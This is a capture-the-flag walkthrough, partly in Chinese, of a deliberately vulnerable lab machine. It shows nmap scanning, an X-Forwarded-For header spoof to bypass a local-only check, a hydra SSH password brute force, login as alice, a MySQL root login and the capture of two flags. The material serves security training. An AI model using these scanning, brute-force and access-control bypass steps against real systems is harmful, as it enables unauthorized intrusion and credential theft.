┌──(kali㉿kali)-[~] └─$ sudo nmap --min-rate 10000 -p- 192.168.56.118 Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-22 11:27 EDT Nmap scan report for 192.168.56.118 Host is up (0.00011s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:6E:E1:A4 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds
┌──(kali㉿kali)-[~] └─$ sudo nmap -sT -sV -O -sC -p22,80 192.168.56.118 Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-22 11:27 EDT Nmap scan report for 192.168.56.118 Host is up (0.00034s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA) | 2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA) | 256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA) |_ 256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-title: Site doesn\'t have a title (text/html). |_http-server-header: Apache/2.4.7 (Ubuntu) MAC Address: 08:00:27:6E:E1:A4 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
┌──(kali㉿kali)-[~] └─$ sudo nmap --script=vuln -p22,80 192.168.56.118 Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-22 11:29 EDT Nmap scan report for 192.168.56.118 Host is up (0.00034s latency).
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-dombased-xss: Couldn\'t find any DOM based XSS. |_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities. |_http-csrf: Couldn\'t find any CSRF vulnerabilities. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) | http-enum: | /robots.txt: Robots file | /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' |_ /misc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server\'s resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ MAC Address: 08:00:27:6E:E1:A4 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 321.61 seconds
漏洞脚本扫描中给出了 robots.txt ,其中有个文件名 heyhoo.txt 打开发现:
并没有特别的提示,config 目录下有个 config.php 文件,但是下载不下来
misc 目录下的文件也一样,无法下载
Web 渗透
页面提示只运行本地访问
那也许 x-forwarded-for:127.0.0.1 可以绕过,使用 burp suite 进行尝试
┌──(kali㉿kali)-[~/Downloads/meandgirlfriend] └─$ hydra -L user -P passwd 192.168.56.118 ssh Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-22 22:28:40 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task [DATA] attacking ssh://192.168.56.118:22/ [22][ssh] host: 192.168.56.118 login: alice password: 4lic3 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-22 22:28:45
┌──(kali㉿kali)-[~/tools] └─$ ssh alice@192.168.56.118 The authenticity of host '192.168.56.118 (192.168.56.118)' can\'t be established. ED25519 key fingerprint is SHA256:xQf3lfh03E3NNnt5rN/N5zVlGxJJo8QcKykWWCSg1SM. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.56.118' (ED25519) to the list of known hosts. alice@192.168.56.118\'s password: Last login: Fri Dec 13 14:48:25 2019 alice@gfriEND:~$ whoami alice alice@gfriEND:/home$ ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 08:00:27:6e:e1:a4 brd ff:ff:ff:ff:ff:ff inet 192.168.56.118/24 brd 192.168.56.255 scope global eth0 valid_lft forever preferred_lft forever inet6 fe80::a00:27ff:fe6e:e1a4/64 scope link valid_lft forever preferred_lft forever
alice@gfriEND:/home$ id uid=1000(alice) gid=1001(alice) groups=1001(alice) alice@gfriEND:/home$ uname -a Linux gfriEND 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
alice@gfriEND:~$ ls -liah total 32K 21088 drwxr-xr-x 4 alice alice 4.0K Dec 13 2019 . 12 drwxr-xr-x 6 root root 4.0K Dec 13 2019 .. 21128 -rw------- 1 alice alice 10 Dec 13 2019 .bash_history 21090 -rw-r--r-- 1 alice alice 220 Dec 13 2019 .bash_logout 21089 -rw-r--r-- 1 alice alice 3.6K Dec 13 2019 .bashrc 21126 drwx------ 2 alice alice 4.0K Dec 13 2019 .cache 142082 drwxrwxr-x 2 alice alice 4.0K Dec 13 2019 .my_secret 21091 -rw-r--r-- 1 alice alice 675 Dec 13 2019 .profile alice@gfriEND:~$ cat .bash_history exit exit alice@gfriEND:~$ cd .my_secret/ alice@gfriEND:~/.my_secret$ ls -liah total 16K 142082 drwxrwxr-x 2 alice alice 4.0K Dec 13 2019 . 21088 drwxr-xr-x 4 alice alice 4.0K Dec 13 2019 .. 21104 -rw-r--r-- 1 root root 306 Dec 13 2019 flag1.txt 21087 -rw-rw-r-- 1 alice alice 119 Dec 13 2019 my_notes.txt alice@gfriEND:~/.my_secret$ cat flag1.txt Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
Now your last job is get access to the root and read the flag ^_^
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
alice@gfriEND:~/.my_secret$ cat my_notes.txt Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes
alice@gfriEND:/var/www/html/config$ mysql -uroot -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 475 Server version: 5.5.64-MariaDB-1ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.
MariaDB [(none)]> use ceban_corp Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)
Contact me if you want to contribute / give me feedback / share your writeup! Twitter: @makegreatagain_ Instagram: @aldodimas73
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
